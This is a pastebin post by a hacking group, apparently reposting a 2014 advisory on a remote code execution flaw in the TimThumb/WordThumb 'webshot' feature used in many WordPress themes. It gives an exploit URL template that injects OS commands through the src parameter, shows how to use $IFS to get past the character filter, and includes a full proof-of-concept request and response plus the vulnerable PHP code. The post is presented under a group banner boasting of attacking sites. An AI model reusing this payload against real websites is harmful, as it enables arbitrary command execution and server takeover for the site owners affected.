SHOW:
|
|
- or go back to the newest paste.
1 | We are... | |
2 | _____ _________ | |
3 | / _ \ ____ ____ ____ / _____/ ____ ____ | |
4 | / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\ | |
5 | / | \ | ( <_> ) | \/ \ ___/\ \___ | |
6 | \____|__ /___| /\____/|___| /_______ /\___ >\___ > | |
7 | \/ \/ \/ \/ \/ \/ | |
8 | //Laughing at your security since 2012* | |
9 | ================================================================================================= | |
10 | Official Members: Mrlele - AnonSec666 - 3r3b0s - 4prili666h05t - Hannaichi - ap3x h4x0r - d3f4ult | |
11 | ================================================================================================= | |
12 | ||
13 | _cant catch the rat... ~~(8:> | |
14 | ||
15 | ||
16 | ###################################################################### | |
17 | # _ ___ _ _ ____ ____ _ _____ | |
18 | # | | / _ \| \ | |/ ___|/ ___| / \|_ _| | |
19 | # | | | | | | \| | | _| | / _ \ | | | |
20 | # | |__| |_| | |\ | |_| | |___ / ___ \| | | |
21 | # |_____\___/|_| \_|\____|\____/_/ \_\_| | |
22 | # | |
23 | # Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day) | |
24 | # Affected website : a lot Wordpress Themes, Plugins, 3rd party components | |
25 | # Release dates : June 24, 2014 | |
26 | # | |
27 | # Special Thanks to 2600 Thailand group | |
28 | # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio | |
29 | # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ | |
30 | # | |
31 | ######################################################################## | |
32 | ||
33 | [+] Description | |
34 | ============================================================ | |
35 | TimThumb is a small php script for cropping, zooming and resizing web | |
36 | images (jpg, png, gif). Perfect for use on blogs and other applications. | |
37 | Developed for use in the WordPress theme Mimbo Pro, and since used in many | |
38 | other WordPress themes. | |
39 | ||
40 | http://www.binarymoon.co.uk/projects/timthumb/ | |
41 | https://code.google.com/p/timthumb/ | |
42 | ||
43 | The original project WordThumb 1.07 also vulnerable ( | |
44 | https://code.google.com/p/wordthumb/) | |
45 | They both shared exactly the same WebShot code! And there are several | |
46 | projects that shipped with "timthumb.php", such as, | |
47 | Wordpress Gallery Plugin | |
48 | https://wordpress.org/plugins/wordpress-gallery-plugin/ | |
49 | IGIT Posts Slider Widget | |
50 | http://wordpress.org/plugins/igit-posts-slider-widget/ | |
51 | ||
52 | All themes from http://themify.me/ contains vulnerable "wordthumb" in | |
53 | "<theme-name>/themify/img.php". | |
54 | ||
55 | [+] Exploit | |
56 | ============================================================ | |
57 | http:// | |
58 | <wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http:// | |
59 | <wp-website>$(<os-cmds>) | |
60 | ||
61 | ** Note that OS commands payload MUST be within following character sets: | |
62 | [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\ () \!\$\&\'\(\)\*\+\,\;\=] | |
63 | ||
64 | ** Spaces, Pipe, GT sign are not allowed. | |
65 | ** This WebShot feature is DISABLED by default. | |
66 | ** CutyCapt and XVFB must be installed in constants. | |
67 | ||
68 | [+] Proof-of-Concept | |
69 | ============================================================ | |
70 | There are couple techniques that can be used to bypass limited charsets but | |
71 | I will use a shell variable $IFS insteads of space in this scenario. | |
72 | ||
73 | PoC Environment: | |
74 | Ubuntu 14.04 LTS | |
75 | PHP 5.5.9 | |
76 | Wordpress 3.9.1 | |
77 | Themify Parallax Theme 1.5.2 | |
78 | WordThumb 1.07 | |
79 | ||
80 | Crafted Exploit: | |
81 | http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat) | |
82 | ||
83 | GET /wp-content/themes/parallax/themify/img.php?webshot=1&src= | |
84 | http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1 | |
85 | Host: longcatlab.local | |
86 | Proxy-Connection: keep-alive | |
87 | Cache-Control: max-age=0 | |
88 | Accept: | |
89 | text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
90 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like | |
91 | Gecko) Chrome/35.0.1916.153 Safari/537.36 | |
92 | Accept-Encoding: gzip,deflate,sdch | |
93 | Accept-Language: en-US,en;q=0.8 | |
94 | Cookie: woocommerce_recently_viewed=9%7C12%7C16; | |
95 | wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; | |
96 | wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot; | |
97 | wordpress_test_cookie=WP+Cookie+check; | |
98 | wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685 | |
99 | ||
100 | HTTP/1.1 400 Bad Request | |
101 | Date: Tue, 24 Jun 2014 07:20:48 GMT | |
102 | Server: Apache | |
103 | X-Powered-By: PHP/5.5.9-1ubuntu4 | |
104 | X-Content-Type-Options: nosniff | |
105 | X-Frame-Options: sameorigin | |
106 | Content-Length: 3059 | |
107 | Connection: close | |
108 | Content-Type: text/html | |
109 | ||
110 | … | |
111 | <a href='http://www.php.net/function.getimagesize' | |
112 | target='_new'>getimagesize</a> | |
113 | ( )</td><td | |
114 | title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php' | |
115 | bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr> | |
116 | </table></font> | |
117 | <h1>A WordThumb error has occured</h1>The following error(s) occured:<br | |
118 | /><ul><li>The image being resized is not a valid gif, jpg or | |
119 | png.</li></ul><br /><br />Query String : webshot=1&src= | |
120 | http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version : | |
121 | 1.07</pre> | |
122 | ||
123 | Even it response with error messages but injected OS command has already | |
124 | been executed. | |
125 | ||
126 | $ ls /tmp/longcat -lha | |
127 | - -rw-r--r-- 1 www-data www-data 0 มิ.ย. 24 14:20 /tmp/longcat | |
128 | ||
129 | ||
130 | [+] Vulnerability Analysis | |
131 | ============================================================ | |
132 | https://timthumb.googlecode.com/svn/trunk/timthumb.php | |
133 | ||
134 | Filename: timthumb.php | |
135 | ||
136 | if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true); | |
137 | if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT', | |
138 | '/usr/local/bin/CutyCapt'); | |
139 | if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run'); | |
140 | ... | |
141 | timthumb::start(); ← start script | |
142 | ... | |
143 | public static function start(){ | |
144 | $tim = new timthumb(); ← create timthumb object, call __construct() | |
145 | ... | |
146 | $tim->run(); | |
147 | ... | |
148 | public function __construct(){ | |
149 | ... | |
150 | $this->src = $this->param('src'); ← set "src" variable to HTTP GET "src" | |
151 | parameter | |
152 | … | |
153 | if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){ | |
154 | ... | |
155 | $this->isURL = true; ← prefix http/s result in isURL = true | |
156 | } | |
157 | ... | |
158 | ||
159 | protected function param($property, $default = ''){ | |
160 | if (isset ($_GET[$property])) { | |
161 | return $_GET[$property]; | |
162 | ... | |
163 | ||
164 | public function run(){ | |
165 | if($this->isURL){ | |
166 | ... | |
167 | if($this->param('webshot')){ ← HTTP GET "webshot" must submitted | |
168 | if(WEBSHOT_ENABLED){ ← this pre-defined constant must be true | |
169 | ... | |
170 | $this->serveWebshot(); ← call webshot feature | |
171 | } else { | |
172 | ... | |
173 | ||
174 | protected function serveWebshot(){ | |
175 | ... | |
176 | if(! is_file(WEBSHOT_CUTYCAPT)){ ← check existing of cutycapt | |
177 | return $this->error("CutyCapt is not installed. $instr"); | |
178 | } | |
179 | if(! is_file(WEBSHOT_XVFB)){ ← check existing of xvfb | |
180 | return $this->Error("Xvfb is not installed. $instr"); | |
181 | } | |
182 | ... | |
183 | $url = $this->src; | |
184 | if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ← check valid | |
185 | URL #LoL | |
186 | return $this->error("Invalid URL supplied."); | |
187 | } | |
188 | $url = | |
189 | preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\ () \!\$\&\'\(\)\*\+\,\;\=]+/', | |
190 | '', $url); ← check valid URL as specified in RFC 3986 | |
191 | http://www.ietf.org/rfc/rfc3986.txt | |
192 | ... | |
193 | if(WEBSHOT_XVFB_RUNNING){ | |
194 | putenv('DISPLAY=:100.0'); | |
195 | $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" | |
196 | --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn | |
197 | --js-can-open-windows=off --url=\"$url\" --out-format=$format | |
198 | --out=$tempfile"; ← OS shell command injection | |
199 | } else { | |
200 | $command = "$xv --server-args=\"-screen 0, | |
201 | {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout | |
202 | --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn | |
203 | --js-can-open-windows=off --url=\"$url\" --out-format=$format | |
204 | --out=$tempfile"; ← OS shell command injection | |
205 | } | |
206 | ... | |
207 | $out = `$command`; ← execute $command as shell command | |
208 | ||
209 | "PHP supports one execution operator: backticks (``). Note that these are | |
210 | not single-quotes! PHP will attempt to execute the contents of the | |
211 | backticks as a shell command." - | |
212 | http://www.php.net//manual/en/language.operators.execution.php | |
213 | ||
214 | "$url" is failed to escape "$()" in "$command" which is result in arbitrary | |
215 | code execution. |